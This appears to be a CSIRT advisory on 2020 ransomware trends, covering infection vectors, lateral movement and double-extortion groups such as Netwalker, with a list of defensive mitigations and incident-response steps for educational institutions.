Throughout 2020 we have seen different types of ransomware utilising various attack methods and operational techniques to infiltrate networks. The types seen include: RYUK, Ouroboros, Cryakl, rEvil, Mapo and Corona-lock. One common initial infection vector has been malware such as TrickBot (commonly seen within a triple threat vector alongside Emotet and RYUK). While infection via malware is still seen, there has been an increase in the rate of infection by other methods. Previously, access over RDP was mostly seen alongside malware but has now become the most common infection technique through utilising credential theft. The rEvil group also commonly utilises known vulnerabilities and was seen exploiting the Pulse secure vulnerability CVE-2019-11510 in January. This increase in non-malware related infection vectors emphasises the importance of keeping software patched and up to date.
Other than the initial infection, most ransomware will aim to traverse the network in order to spread to as many devices as possible, while some will also attempt to gain admin rights to bypass privilege issues and Mimikatz has been seen being utilised in this way. For lateral movement both PSEXEC and RDP have been seen.
Some traditional antivirus solutions not only fail to detect the presence of many ransomwares but can also be switched off during the infection process. Some ransomware events have utilised PowerShell and batch files to run malicious scripts, these are also often not detected by traditional AV due to being allow-listed script usage. This is why more modern behaviour-based EDR solutions are recommended as they can detect ransomware and even zero-day threats based on all tactics and techniques rather than only known signatures. A lot of these solutions will also alert you to any newly published vulnerabilities relevant to your systems.
A group seen in the media recently after a US University decided to pay their ransom is Netwalker. Netwalker along with rEvil are among some ransomware groups that have decided to implement a double attack style whereby they exfiltrate sensitive data from a victim before encryption. This provides a second threat as even if a victim can recover from the encryption by utilising backups, their data will still be released leaving them open to potential fines from data protection authorities and reputational damage. These potential consequences are attempting to force victims to be more encouraged to pay the ransom.
Although Netwalker does target other sectors, it has focused on education. UK organisations have been affected by them before but only US universities have been seen so far in the Education sector. These attacks were seen after they changed to a RaaS model so they may expand further and be a potential threat to educational institutes here too.
In order to mitigate against the most common ransomware attack methods, here are some recommended steps to take:
- Keep systems and software updated and patch known vulnerabilities
- Disable SMBv1, upgrade to SMBv3
- Remove RDP on public Ips, put behind a VPN
- Invest in heuristic behaviour-based AV
- Implement architectural controls to segment network
- Limit PowerShell execution and capture PowerShell logs
- Check email attachments – disable macros on externally received documents and scan for malware
- Keep isolated backups
If you suffer a ransomware event, it is important to follow the SANS incident lifecycle steps to identify the infection, contain the outbreak, ensure the accounts, devices and logging involved have been captured and remediated before restoring from isolated backup. Janet CSIRT can assist with Incident Response including digital forensics.